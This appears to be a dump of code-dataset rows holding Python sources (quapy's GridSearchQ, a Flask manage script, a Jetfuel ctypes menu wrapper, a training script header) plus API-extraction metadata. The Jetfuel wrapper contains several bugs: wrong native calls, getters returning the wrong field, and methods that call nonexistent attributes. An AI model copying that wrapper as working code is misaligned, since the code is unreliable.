'client_affine_properties'], {}), \"(__self__, 'client_affine_properties', client_affine_properties)\\n\", (1770, 1834), False, 'import pulumi\\n'), ((1987, 2039), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"count_details\"\"\"', 'count_details'], {}), \"(__self__, 'count_details', count_details)\\n\", (1997, 2039), False, 'import pulumi\\n'), ((2181, 2227), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"created_at\"\"\"', 'created_at'], {}), \"(__self__, 'created_at', created_at)\\n\", (2191, 2227), False, 'import pulumi\\n'), ((2479, 2601), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"dead_lettering_on_filter_evaluation_exceptions\"\"\"', 'dead_lettering_on_filter_evaluation_exceptions'], {}), \"(__self__, 'dead_lettering_on_filter_evaluation_exceptions',\\n dead_lettering_on_filter_evaluation_exceptions)\\n\", (2489, 2601), False, 'import pulumi\\n'), ((2819, 2921), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"dead_lettering_on_message_expiration\"\"\"', 'dead_lettering_on_message_expiration'], {}), \"(__self__, 'dead_lettering_on_message_expiration',\\n dead_lettering_on_message_expiration)\\n\", (2829, 2921), False, 'import pulumi\\n'), ((3113, 3199), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"default_message_time_to_live\"\"\"', 'default_message_time_to_live'], {}), \"(__self__, 'default_message_time_to_live',\\n default_message_time_to_live)\\n\", (3123, 3199), False, 'import pulumi\\n'), ((3424, 3532), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"duplicate_detection_history_time_window\"\"\"', 'duplicate_detection_history_time_window'], {}), \"(__self__, 'duplicate_detection_history_time_window',\\n duplicate_detection_history_time_window)\\n\", (3434, 3532), False, 'import pulumi\\n'), ((3717, 3793), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"enable_batched_operations\"\"\"', 'enable_batched_operations'], {}), \"(__self__, 'enable_batched_operations', enable_batched_operations)\\n\", (3727, 3793), False, 'import pulumi\\n'), ((4004, 4100), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"forward_dead_lettered_messages_to\"\"\"', 'forward_dead_lettered_messages_to'], {}), \"(__self__, 'forward_dead_lettered_messages_to',\\n forward_dead_lettered_messages_to)\\n\", (4014, 4100), False, 'import pulumi\\n'), ((4238, 4284), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"forward_to\"\"\"', 'forward_to'], {}), \"(__self__, 'forward_to', forward_to)\\n\", (4248, 4284), False, 'import pulumi\\n'), ((4402, 4432), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"id\"\"\"', 'id'], {}), \"(__self__, 'id', id)\\n\", (4412, 4432), False, 'import pulumi\\n'), ((4594, 4652), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"is_client_affine\"\"\"', 'is_client_affine'], {}), \"(__self__, 'is_client_affine', is_client_affine)\\n\", (4604, 4652), False, 'import pulumi\\n'), ((4803, 4855), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"lock_duration\"\"\"', 'lock_duration'], {}), \"(__self__, 'lock_duration', lock_duration)\\n\", (4813, 4855), False, 'import pulumi\\n'), ((5021, 5083), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"max_delivery_count\"\"\"', 'max_delivery_count'], {}), \"(__self__, 'max_delivery_count', max_delivery_count)\\n\", (5031, 5083), False, 'import pulumi\\n'), ((5238, 5290), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"message_count\"\"\"', 'message_count'], {}), \"(__self__, 'message_count', message_count)\\n\", (5248, 5290), False, 'import pulumi\\n'), ((5414, 5448), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"name\"\"\"', 
'name'], {}), \"(__self__, 'name', name)\\n\", (5424, 5448), False, 'import pulumi\\n'), ((5610, 5668), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"requires_session\"\"\"', 'requires_session'], {}), \"(__self__, 'requires_session', requires_session)\\n\", (5620, 5668), False, 'import pulumi\\n'), ((5798, 5836), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"status\"\"\"', 'status'], {}), \"(__self__, 'status', status)\\n\", (5808, 5836), False, 'import pulumi\\n'), ((5983, 6031), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"system_data\"\"\"', 'system_data'], {}), \"(__self__, 'system_data', system_data)\\n\", (5993, 6031), False, 'import pulumi\\n'), ((6155, 6189), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"type\"\"\"', 'type'], {}), \"(__self__, 'type', type)\\n\", (6165, 6189), False, 'import pulumi\\n'), ((6331, 6377), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"updated_at\"\"\"', 'updated_at'], {}), \"(__self__, 'updated_at', updated_at)\\n\", (6341, 6377), False, 'import pulumi\\n'), ((6572, 6603), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"accessed_at\"\"\"'], {}), \"(self, 'accessed_at')\\n\", (6582, 6603), False, 'import pulumi\\n'), ((6877, 6916), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"auto_delete_on_idle\"\"\"'], {}), \"(self, 'auto_delete_on_idle')\\n\", (6887, 6916), False, 'import pulumi\\n'), ((7177, 7221), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"client_affine_properties\"\"\"'], {}), \"(self, 'client_affine_properties')\\n\", (7187, 7221), False, 'import pulumi\\n'), ((7416, 7449), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"count_details\"\"\"'], {}), \"(self, 'count_details')\\n\", (7426, 7449), False, 'import pulumi\\n'), ((7618, 7648), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"created_at\"\"\"'], {}), \"(self, 'created_at')\\n\", (7628, 7648), False, 'import pulumi\\n'), ((7961, 8027), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"dead_lettering_on_filter_evaluation_exceptions\"\"\"'], {}), \"(self, 'dead_lettering_on_filter_evaluation_exceptions')\\n\", (7971, 8027), False, 'import pulumi\\n'), ((8312, 8368), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"dead_lettering_on_message_expiration\"\"\"'], {}), \"(self, 'dead_lettering_on_message_expiration')\\n\", (8322, 8368), False, 'import pulumi\\n'), ((8781, 8829), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"default_message_time_to_live\"\"\"'], {}), \"(self, 'default_message_time_to_live')\\n\", (8791, 8829), False, 'import pulumi\\n'), ((9150, 9209), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"duplicate_detection_history_time_window\"\"\"'], {}), \"(self, 'duplicate_detection_history_time_window')\\n\", (9160, 9209), False, 'import pulumi\\n'), ((9455, 9500), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"enable_batched_operations\"\"\"'], {}), \"(self, 'enable_batched_operations')\\n\", (9465, 9500), False, 'import pulumi\\n'), ((9738, 9791), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"forward_dead_lettered_messages_to\"\"\"'], {}), \"(self, 'forward_dead_lettered_messages_to')\\n\", (9748, 9791), False, 'import pulumi\\n'), ((9975, 10005), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"forward_to\"\"\"'], {}), \"(self, 'forward_to')\\n\", (9985, 10005), False, 'import pulumi\\n'), ((10124, 10146), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"id\"\"\"'], {}), \"(self, 'id')\\n\", (10134, 10146), False, 'import pulumi\\n'), ((10381, 10417), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"is_client_affine\"\"\"'], {}), \"(self, 'is_client_affine')\\n\", (10391, 10417), False, 'import 
pulumi\\n'), ((10651, 10684), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"lock_duration\"\"\"'], {}), \"(self, 'lock_duration')\\n\", (10661, 10684), False, 'import pulumi\\n'), ((10872, 10910), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"max_delivery_count\"\"\"'], {}), \"(self, 'max_delivery_count')\\n\", (10882, 10910), False, 'import pulumi\\n'), ((11071, 11104), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"message_count\"\"\"'], {}), \"(self, 'message_count')\\n\", (11081, 11104), False, 'import pulumi\\n'), ((11227, 11251), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"name\"\"\"'], {}), \"(self, 'name')\\n\", (11237, 11251), False, 'import pulumi\\n'), ((11476, 11512), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"requires_session\"\"\"'], {}), \"(self, 'requires_session')\\n\", (11486, 11512), False, 'import pulumi\\n'), ((11702, 11728), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"status\"\"\"'], {}), \"(self, 'status')\\n\", (11712, 11728), False, 'import pulumi\\n'), ((11936, 11967), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"system_data\"\"\"'], {}), \"(self, 'system_data')\\n\", (11946, 11967), False, 'import pulumi\\n'), ((12090, 12114), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"type\"\"\"'], {}), \"(self, 'type')\\n\", (12100, 12114), False, 'import pulumi\\n'), ((12287, 12317), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"updated_at\"\"\"'], {}), \"(self, 'updated_at')\\n\", (12297, 12317), False, 'import pulumi\\n'), ((14701, 14723), 'pulumi.InvokeOptions', 'pulumi.InvokeOptions', ([], {}), '()\\n', (14721, 14723), False, 'import pulumi\\n'), ((14815, 14953), 'pulumi.runtime.invoke', 'pulumi.runtime.invoke', (['\"\"\"azure-native:servicebus/v20210601preview:getSubscription\"\"\"', '__args__'], {'opts': 'opts', 'typ': 'GetSubscriptionResult'}), \"(\\n 'azure-native:servicebus/v20210601preview:getSubscription', __args__,\\n opts=opts, typ=GetSubscriptionResult)\\n\", (14836, 14953), False, 'import pulumi\\n')]"}}},{"rowIdx":794,"cells":{"code":{"kind":"string","value":"import itertools\nimport signal\nfrom copy import deepcopy\nfrom typing import Union, Callable\n\nimport numpy as np\n\nimport quapy as qp\nfrom quapy.data.base import LabelledCollection\nfrom quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\nfrom quapy.method.aggregative import BaseQuantifier\nimport inspect\n\nfrom util import _check_sample_size\n\n\nclass GridSearchQ(BaseQuantifier):\n \"\"\"Grid Search optimization targeting a quantification-oriented metric.\n\n Optimizes the hyperparameters of a quantification method, based on an evaluation method and on an evaluation\n protocol for quantification.\n\n :param model: the quantifier to optimize\n :type model: BaseQuantifier\n :param param_grid: a dictionary with keys the parameter names and values the list of values to explore\n :param sample_size: the size of the samples to extract from the validation set (ignored if protocl='gen')\n :param protocol: either 'app' for the artificial prevalence protocol, 'npp' for the natural prevalence\n protocol, or 'gen' for using a custom sampling generator function\n :param n_prevpoints: if specified, indicates the number of equally distant points to extract from the interval\n [0,1] in order to define the prevalences of the samples; e.g., if n_prevpoints=5, then the prevalences for\n each class will be explored in [0.00, 0.25, 0.50, 0.75, 1.00]. 
If not specified, then eval_budget is requested.\n Ignored if protocol!='app'.\n :param n_repetitions: the number of repetitions for each combination of prevalences. This parameter is ignored\n for the protocol='app' if eval_budget is set and is lower than the number of combinations that would be\n generated using the value assigned to n_prevpoints (for the current number of classes and n_repetitions).\n Ignored for protocol='npp' and protocol='gen' (use eval_budget for setting a maximum number of samples in\n those cases).\n :param eval_budget: if specified, sets a ceil on the number of evaluations to perform for each hyper-parameter\n combination. For example, if protocol='app', there are 3 classes, n_repetitions=1 and eval_budget=20, then\n n_prevpoints will be set to 5, since this will generate 15 different prevalences, i.e., [0, 0, 1],\n [0, 0.25, 0.75], [0, 0.5, 0.5] ... [1, 0, 0], and since setting it to 6 would generate more than\n 20. When protocol='gen', indicates the maximum number of samples to generate, but less samples will be\n generated if the generator yields less samples.\n :param error: an error function (callable) or a string indicating the name of an error function (valid ones\n are those in qp.error.QUANTIFICATION_ERROR\n :param refit: whether or not to refit the model on the whole labelled collection (training+validation) with\n the best chosen hyperparameter combination. Ignored if protocol='gen'\n :param val_split: either a LabelledCollection on which to test the performance of the different settings, or\n a float in [0,1] indicating the proportion of labelled data to extract from the training set, or a callable\n returning a generator function each time it is invoked (only for protocol='gen').\n :param n_jobs: number of parallel jobs\n :param random_seed: set the seed of the random generator to replicate experiments. Ignored if protocol='gen'.\n :param timeout: establishes a timer (in seconds) for each of the hyperparameters configurations being tested.\n Whenever a run takes longer than this timer, that configuration will be ignored. If all configurations end up\n being ignored, a TimeoutError exception is raised. If -1 (default) then no time bound is set.\n :param verbose: set to True to get information through the stdout\n \"\"\"\n\n def __init__(self,\n model: BaseQuantifier,\n param_grid: dict,\n sample_size: Union[int, None] = None,\n protocol='app',\n n_prevpoints: int = None,\n n_repetitions: int = 1,\n eval_budget: int = None,\n error: Union[Callable, str] = qp.error.mae,\n refit=True,\n val_split=0.4,\n n_jobs=1,\n random_seed=42,\n timeout=-1,\n verbose=False):\n\n self.model = model\n self.param_grid = param_grid\n self.sample_size = sample_size\n self.protocol = protocol.lower()\n self.n_prevpoints = n_prevpoints\n self.n_repetitions = n_repetitions\n self.eval_budget = eval_budget\n self.refit = refit\n self.val_split = val_split\n self.n_jobs = n_jobs\n self.random_seed = random_seed\n self.timeout = timeout\n self.verbose = verbose\n self.__check_error(error)\n assert self.protocol in {'app', 'npp', 'gen'}, \\\n 'unknown protocol: valid ones are \"app\" or \"npp\" for the \"artificial\" or the \"natural\" prevalence ' \\\n 'protocols. 
Use protocol=\"gen\" when passing a generator function thorough val_split that yields a ' \\\n 'sample (instances) and their prevalence (ndarray) at each iteration.'\n assert self.eval_budget is None or isinstance(self.eval_budget, int)\n if self.protocol in ['npp', 'gen']:\n if self.protocol=='npp' and (self.eval_budget is None or self.eval_budget <= 0):\n raise ValueError(f'when protocol=\"npp\" the parameter eval_budget should be '\n f'indicated (and should be >0).')\n if self.n_repetitions != 1:\n print('[warning] n_repetitions has been set and will be ignored for the selected protocol')\n\n def _sout(self, msg):\n if self.verbose:\n print(f'[{self.__class__.__name__}]: {msg}')\n\n def __check_training_validation(self, training, validation):\n if isinstance(validation, LabelledCollection):\n return training, validation\n elif isinstance(validation, float):\n assert 0. < validation < 1., 'validation proportion should be in (0,1)'\n training, validation = training.split_stratified(train_prop=1 - validation, random_state=self.random_seed)\n return training, validation\n elif self.protocol=='gen' and inspect.isgenerator(validation()):\n return training, validation\n else:\n raise ValueError(f'\"validation\" must either be a LabelledCollection or a float in (0,1) indicating the'\n f'proportion of training documents to extract (type found: {type(validation)}). '\n f'Optionally, \"validation\" can be a callable function returning a generator that yields '\n f'the sample instances along with their true prevalence at each iteration by '\n f'setting protocol=\"gen\".')\n\n def __check_error(self, error):\n if error in qp.error.QUANTIFICATION_ERROR:\n self.error = error\n elif isinstance(error, str):\n self.error = qp.error.from_name(error)\n elif hasattr(error, '__call__'):\n self.error = error\n else:\n raise ValueError(f'unexpected error type; must either be a callable function or a str representing\\n'\n f'the name of an error function in {qp.error.QUANTIFICATION_ERROR_NAMES}')\n\n def __generate_predictions(self, model, val_split):\n commons = {\n 'n_repetitions': self.n_repetitions,\n 'n_jobs': self.n_jobs,\n 'random_seed': self.random_seed,\n 'verbose': False\n }\n if self.protocol == 'app':\n return artificial_prevalence_prediction(\n model, val_split, self.sample_size,\n n_prevpoints=self.n_prevpoints,\n eval_budget=self.eval_budget,\n **commons\n )\n elif self.protocol == 'npp':\n return natural_prevalence_prediction(\n model, val_split, self.sample_size,\n **commons)\n elif self.protocol == 'gen':\n return gen_prevalence_prediction(model, gen_fn=val_split, eval_budget=self.eval_budget)\n else:\n raise ValueError('unknown protocol')\n\n def fit(self, training: LabelledCollection, val_split: Union[LabelledCollection, float, Callable] = None):\n \"\"\" Learning routine. 
Fits methods with all combinations of hyperparameters and selects the one minimizing\n the error metric.\n\n :param training: the training set on which to optimize the hyperparameters\n :param val_split: either a LabelledCollection on which to test the performance of the different settings, or\n a float in [0,1] indicating the proportion of labelled data to extract from the training set\n :return: self\n \"\"\"\n if val_split is None:\n val_split = self.val_split\n training, val_split = self.__check_training_validation(training, val_split)\n if self.protocol != 'gen':\n self.sample_size = _check_sample_size(self.sample_size)\n\n params_keys = list(self.param_grid.keys())\n params_values = list(self.param_grid.values())\n\n model = self.model\n\n if self.timeout > 0:\n def handler(signum, frame):\n self._sout('timeout reached')\n raise TimeoutError()\n\n signal.signal(signal.SIGALRM, handler)\n\n self.param_scores_ = {}\n self.best_score_ = None\n some_timeouts = False\n for values in itertools.product(*params_values):\n params = dict({k: values[i] for i, k in enumerate(params_keys)})\n\n if self.timeout > 0:\n signal.alarm(self.timeout)\n\n try:\n # overrides default parameters with the parameters being explored at this iteration\n model.set_params(**params)\n model.fit(training)\n true_prevalences, estim_prevalences = self.__generate_predictions(model, val_split)\n score = self.error(true_prevalences, estim_prevalences)\n\n self._sout(f'checking hyperparams={params} got {self.error.__name__} score {score:.5f}')\n if self.best_score_ is None or score < self.best_score_:\n self.best_score_ = score\n self.best_params_ = params\n self.best_model_ = deepcopy(model)\n self.param_scores_[str(params)] = score\n\n if self.timeout > 0:\n signal.alarm(0)\n except TimeoutError:\n print(f'timeout reached for config {params}')\n some_timeouts = True\n\n if self.best_score_ is None and some_timeouts:\n raise TimeoutError('all jobs took more than the timeout time to end')\n\n self._sout(f'optimization finished: best params {self.best_params_} (score={self.best_score_:.5f})')\n\n if self.refit:\n self._sout(f'refitting on the whole development set')\n self.best_model_.fit(training + val_split)\n\n return self\n\n def quantify(self, instances):\n \"\"\"Estimate class prevalence values using the best model found after calling the :meth:`fit` method.\n\n :param instances: sample contanining the instances\n :return: a ndarray of shape `(n_classes)` with class prevalence estimates as according to the best model found\n by the model selection process.\n \"\"\"\n assert hasattr(self, 'best_model_'), 'quantify called before fit'\n return self.best_model().quantify(instances)\n\n @property\n def classes_(self):\n \"\"\"\n Classes on which the quantifier has been trained on.\n :return: a ndarray of shape `(n_classes)` with the class identifiers\n \"\"\"\n return self.best_model().classes_\n\n def set_params(self, **parameters):\n \"\"\"Sets the hyper-parameters to explore.\n\n :param parameters: a dictionary with keys the parameter names and values the list of values to explore\n \"\"\"\n self.param_grid = parameters\n\n def get_params(self, deep=True):\n \"\"\"Returns the dictionary of hyper-parameters to explore (`param_grid`)\n\n :param deep: Unused\n :return: the dictionary `param_grid`\n \"\"\"\n return self.param_grid\n\n def best_model(self):\n \"\"\"\n Returns the best model found after calling the :meth:`fit` method, i.e., the one trained on the combination\n of hyper-parameters that minimized the error 
function.\n\n :return: a trained quantifier\n \"\"\"\n if hasattr(self, 'best_model_'):\n return self.best_model_\n raise ValueError('best_model called before fit')\n"},"apis":{"kind":"list like","value":["quapy.evaluation.natural_prevalence_prediction","signal.signal","util._check_sample_size","itertools.product","quapy.error.from_name","quapy.evaluation.artificial_prevalence_prediction","quapy.evaluation.gen_prevalence_prediction","signal.alarm","copy.deepcopy"],"string":"[\n \"quapy.evaluation.natural_prevalence_prediction\",\n \"signal.signal\",\n \"util._check_sample_size\",\n \"itertools.product\",\n \"quapy.error.from_name\",\n \"quapy.evaluation.artificial_prevalence_prediction\",\n \"quapy.evaluation.gen_prevalence_prediction\",\n \"signal.alarm\",\n \"copy.deepcopy\"\n]"},"extract_api":{"kind":"string","value":"[((9694, 9727), 'itertools.product', 'itertools.product', (['*params_values'], {}), '(*params_values)\\n', (9711, 9727), False, 'import itertools\\n'), ((7798, 7943), 'quapy.evaluation.artificial_prevalence_prediction', 'artificial_prevalence_prediction', (['model', 'val_split', 'self.sample_size'], {'n_prevpoints': 'self.n_prevpoints', 'eval_budget': 'self.eval_budget'}), '(model, val_split, self.sample_size,\\n n_prevpoints=self.n_prevpoints, eval_budget=self.eval_budget, **commons)\\n', (7830, 7943), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\\n'), ((9200, 9236), 'util._check_sample_size', '_check_sample_size', (['self.sample_size'], {}), '(self.sample_size)\\n', (9218, 9236), False, 'from util import _check_sample_size\\n'), ((9538, 9576), 'signal.signal', 'signal.signal', (['signal.SIGALRM', 'handler'], {}), '(signal.SIGALRM, handler)\\n', (9551, 9576), False, 'import signal\\n'), ((7169, 7194), 'quapy.error.from_name', 'qp.error.from_name', (['error'], {}), '(error)\\n', (7187, 7194), True, 'import quapy as qp\\n'), ((8074, 8150), 'quapy.evaluation.natural_prevalence_prediction', 'natural_prevalence_prediction', (['model', 'val_split', 'self.sample_size'], {}), '(model, val_split, self.sample_size, **commons)\\n', (8103, 8150), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\\n'), ((9856, 9882), 'signal.alarm', 'signal.alarm', (['self.timeout'], {}), '(self.timeout)\\n', (9868, 9882), False, 'import signal\\n'), ((8240, 8325), 'quapy.evaluation.gen_prevalence_prediction', 'gen_prevalence_prediction', (['model'], {'gen_fn': 'val_split', 'eval_budget': 'self.eval_budget'}), '(model, gen_fn=val_split, eval_budget=self.eval_budget\\n )\\n', (8265, 8325), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\\n'), ((10562, 10577), 'copy.deepcopy', 'deepcopy', (['model'], {}), '(model)\\n', (10570, 10577), False, 'from copy import deepcopy\\n'), ((10692, 10707), 'signal.alarm', 'signal.alarm', (['(0)'], {}), '(0)\\n', (10704, 10707), False, 'import signal\\n')]"}}},{"rowIdx":795,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\nimport os\nfrom flask_migrate import Migrate\nfrom app import create_app, db\nfrom app.models import User, Role, PoseToLocation\n\n\n\napp = create_app(os.getenv('FLASK_CONFIG') or 'default')\nmigrate = Migrate(app, db)\n\n\n# migrate 的新建 我们需要扫描到这些文件我们才能创建\n@app.shell_context_processor\ndef make_shell_context():\n return dict(db=db, User=User, Role=Role, PoseToLocation=PoseToLocation)\n\n\n# 
单元测试\n@app.cli.command()\ndef test():\n \"\"\" run the unit tests \"\"\"\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)\n"},"apis":{"kind":"list like","value":["unittest.TestLoader","flask_migrate.Migrate","unittest.TextTestRunner","os.getenv"],"string":"[\n \"unittest.TestLoader\",\n \"flask_migrate.Migrate\",\n \"unittest.TextTestRunner\",\n \"os.getenv\"\n]"},"extract_api":{"kind":"string","value":"[((220, 236), 'flask_migrate.Migrate', 'Migrate', (['app', 'db'], {}), '(app, db)\\n', (227, 236), False, 'from flask_migrate import Migrate\\n'), ((170, 195), 'os.getenv', 'os.getenv', (['\"\"\"FLASK_CONFIG\"\"\"'], {}), \"('FLASK_CONFIG')\\n\", (179, 195), False, 'import os\\n'), ((505, 526), 'unittest.TestLoader', 'unittest.TestLoader', ([], {}), '()\\n', (524, 526), False, 'import unittest\\n'), ((549, 585), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {'verbosity': '(2)'}), '(verbosity=2)\\n', (572, 585), False, 'import unittest\\n')]"}}},{"rowIdx":796,"cells":{"code":{"kind":"string","value":"# Jetfuel Game Engine- A SDL-based 2D game-engine\n# Copyright (C) 2018 InfernoStudios\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom ctypes import c_uint\nfrom ctypes import c_int \nfrom ctypes import c_void_p\nfrom ctypes import c_bool\nfrom ctypes import c_wchar_p\n\nfrom jetfuel.draw.rectangleinterface import rectangle_interface\nfrom jetfuel.draw.image import image\n\nclass menu(rectangle_interface):\n def __init__(self, jetfuelsoloader, maxheight=None, columngap=None, \n buttongap=None):\n self._jetfuel = jetfuelsoloader.jetfuelso;\n \n if(maxheight is not None and columngap is not None and \n buttongap is not None):\n self._jetfuel.Menu_new_from_heights_and_gaps.argtypes = [c_uint,\n c_uint,\n c_uint];\n self._jetfuel.Menu_new_from_heights_and_gaps.restype = c_void_p;\n \n self.drawableref = self._jetfuel.Menu_new_from_heights_and_gaps(\n maxheight,\n columngap,\n buttongap);\n else:\n self._jetfuel.Menu_new.restype = c_void_p;\n \n self.drawableref = self._jetfuel.Menu_new();\n print(\"Constructed empty drawableref!\");\n \n def get_max_height(self):\n self._jetfuel.Menu_get_max_height.argtypes = [c_void_p];\n self._jetfuel.Menu_get_max_height.restype = c_uint;\n \n return self._jetfuel.Menu_get_max_height(self.drawableref);\n \n def set_max_height(self, maxheight):\n self._jetfuel.Menu_set_max_height.argtypes = [c_void_p, c_uint];\n \n self._jetfuel.Menu_set_max_height(self.drawableref, maxheight);\n \n def get_column_gap(self):\n self._jetfuel.Menu_get_column_gap.argtypes = [c_void_p];\n self._jetfuel.Menu_get_column_gap.restype = c_uint;\n \n return self._jetfuel.Menu_get_column_gap(self.drawableref);\n \n def set_column_gap(self, columngap):\n self._jetfuel.Menu_set_column_gap.argtypes = [c_void_p, c_uint];\n \n self._jetfuel.Menu_set_column_height(self.drawableref, columngap);\n \n def get_button_gap(self):\n self._jetfuel.Menu_get_button_gap.argtypes = [c_void_p];\n 
self._jetfuel.Menu_get_button_gap.restype = c_uint;\n \n return self._jetfuel.Menu_get_column_gap(self.drawableref);\n \n def set_button_gap(self, buttongap):\n self._jetfuel.Menu_set_max_height.argtypes = [c_void_p, c_uint];\n \n self._jetfuel.Menu_set_max_height(self.drawableref, buttongap); \n \n def get_container_box_image(self, jetfuelsoloader):\n self._jetfuel.Menu_get_container_box_image.argtypes = [c_void_p];\n self._jetfuel.Menu_get_container_box_image.restype = c_void_p;\n \n containerboximage = image(jetfuelsoloader);\n \n self._jetfuel.Image_delete.argtypes = [c_void_p];\n \n self._jetfuel.Image_delete(containerboximage.imageref);\n \n containerboximage.imageref = self._jetfuel.Menu_get_container_box_image(\n self.drawableref);\n \n return containerboximage;\n \n def set_container_box_image(self, image, borderwidth, borderheight):\n self._jetfuel.Menu_set_container_box_image.argtypes = [c_void_p, \n c_void_p, c_uint,\n c_uint];\n \n self._jetfuel.Menu_set_container_box_image(image.imageref, borderwidth,\n borderheight);\n \n def get_container_box_border_width(self):\n self._jetfuel.Menu_get_container_box_border_width.argtypes = [c_void_p];\n self._jetfuel.Menu_get_container_box_border_width.restype = c_uint;\n \n return self._jetfuel.Menu_get_container_box_border_width(\n self.drawableref);\n \n def get_container_box_border_height(self):\n self._jetfuel.Menu_get_container_box_border_height.argtypes = [c_void_p];\n self._jetfuel.Menu_get_container_box_border_height.restype = c_uint;\n \n return self._jetfuel.Menu_get_container_box_border_height(\n self.drawableref);\n \n def add_button(self, buttoncharsreplacement, uisactiontowatchfor, \n messagetosenduponclick, messagebus):\n self._jetfuel.Menu_add_button.argtypes = [c_void_p, c_void_p, \n c_wchar_p, c_wchar_p, \n c_void_p];\n self._jetfuel.Menu_add_button.restype = c_bool;\n \n return self._jetfuel.Menu_add_button(self.drawableref, \n buttoncharsreplacement.buttoncharsref,\n uisactiontowatchfor,\n messagetosenduponclick,\n messagebus.messagebusref);\n \n def get_position_x(self):\n self._jetfuel.Menu_get_position_x.argtypes = [c_void_p];\n self._jetfuel.Menu_get_position_x.restype = c_int;\n \n return self.Menu_get_position_x(self.drawableref);\n \n def get_position_y(self):\n self._jetfuel.Menu_get_position_y.argtypes = [c_void_p];\n self._jetfuel.Menu_get_position_y.restype = c_int;\n \n return self.Menu_get_position_y(self.drawableref);\n \n def set_position(self, x, y):\n self._jetfuel.Menu_set_position.argtypes = [c_void_p, c_int, c_int];\n \n self._jetfuel.Menu_set_position(self.drawableref, x, y);\n \n def get_rect_to_draw_width(self):\n self._jetfuel.Menu_get_rect_to_draw_width.argtypes = [c_void_p];\n self._jetfuel.Menu_get_rect_to_draw_width.restype = c_int;\n \n return self.Menu_get_rect_to_draw_width(self.drawableref);\n \n def get_rect_to_draw_height(self):\n self._jetfuel.Menu_get_rect_to_draw_height.argtypes = [c_void_p];\n self._jetfuel.Menu_get_rect_to_draw_height.restype = c_int;\n \n return self.Menu_get_rect_to_draw_height(self.drawableref);\n"},"apis":{"kind":"list like","value":["jetfuel.draw.image.image"],"string":"[\n \"jetfuel.draw.image.image\"\n]"},"extract_api":{"kind":"string","value":"[((3591, 3613), 'jetfuel.draw.image.image', 'image', (['jetfuelsoloader'], {}), '(jetfuelsoloader)\\n', (3596, 3613), False, 'from jetfuel.draw.image import image\\n')]"}}},{"rowIdx":797,"cells":{"code":{"kind":"string","value":"# coding=utf-8\n# Copyright 2021 The Google Research Authors.\n#\n# Licensed under the 
Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# python3\n\"\"\"Train seq-to-seq model on random supervised training tasks.\"\"\"\n\n# pytype: disable=wrong-arg-count\n# pytype: disable=attribute-error\n\nimport collections\nimport functools\nimport json\nimport os\nimport random\nimport sys\nimport time\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nfrom flax import jax_utils\nfrom flax import linen as nn\nfrom flax import optim\nfrom flax.metrics import tensorboard\nfrom flax.training import checkpoints\nfrom flax.training import common_utils\nimport jax\nimport jax.numpy as jnp\nimport numpy as np\nimport tensorflow.compat.v2 as tf\n\nfrom latent_programmer import decode\nfrom latent_programmer import models as base_models\nfrom 